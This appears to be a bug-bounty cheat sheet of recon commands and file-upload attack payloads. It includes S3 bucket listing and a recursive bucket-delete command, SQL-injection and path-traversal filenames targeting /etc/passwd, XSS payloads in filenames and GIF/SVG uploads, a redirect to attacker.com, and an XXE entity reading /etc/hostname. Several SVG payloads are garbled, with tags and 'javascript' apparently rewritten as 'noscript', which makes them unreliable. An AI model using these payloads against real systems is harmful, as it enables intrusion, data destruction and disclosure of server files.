echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)

aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing

'sleep(20).jpg
sleep(25)-- -.jpg

../../etc/passwd/logo.png
../../../logo.png

->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

->  Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <noscript type="text/javanoscript">
      alert("HolyBugx XSS");
   </noscript>
</noscript>

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>